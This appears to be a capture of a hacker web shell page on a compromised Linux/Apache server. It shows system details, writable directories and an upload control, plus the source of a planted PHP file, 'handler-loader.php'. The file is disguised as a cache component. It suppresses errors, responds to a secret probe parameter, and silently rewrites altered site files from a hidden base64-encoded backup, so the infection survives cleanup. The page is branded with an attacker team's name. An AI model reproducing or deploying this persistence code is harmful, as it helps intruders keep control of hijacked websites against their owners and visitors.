Server :
Apache
System :
Linux server1.cbinetwhm.bi 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64
User :
fenacobu (1017)
PHP Version :
8.1.34
Disable Functions :
NONE
Current Directory :
/home/fenacobu/www/includes/cache/
Directory Status:
Writeable | Document Root:
Writeable
Upload File
Viewing: /home/fenacobu/www/includes/cache/handler-loader.php
<?php
@error_reporting(0);
@ini_set('display_errors', 0);
if (isset($_GET['_ck_od4g5sx'])) {
echo '1';
exit;
}
$myDir = dirname(__FILE__);
$rootHop = '../..';
$siteRoot = ($rootHop === '' || $rootHop === '.') ? $myDir : $myDir . '/' . $rootHop;
$backupFile = $siteRoot . '/cache/data/21c79f88c5ac980a501c71923a8be969.dat';
if (!@file_exists($backupFile)) {
http_response_code(404);
echo '0';
exit;
}
$json = @file_get_contents($backupFile);
if (!$json) {
echo '0';
exit;
}
$backup = @json_decode($json, true);
if (!$backup || !isset($backup['files'])) {
echo '0';
exit;
}
$restored = 0;
foreach ($backup['files'] as $file => $data) {
$path = $siteRoot . '/' . $file;
if (!file_exists($path) || md5_file($path) !== $data['md5']) {
$content = base64_decode($data['content']);
if (@file_put_contents($path, $content) !== false) {
$restored++;
}
}
}
echo '1';
?>
Cyb3r Drag0nz Team • Google Edition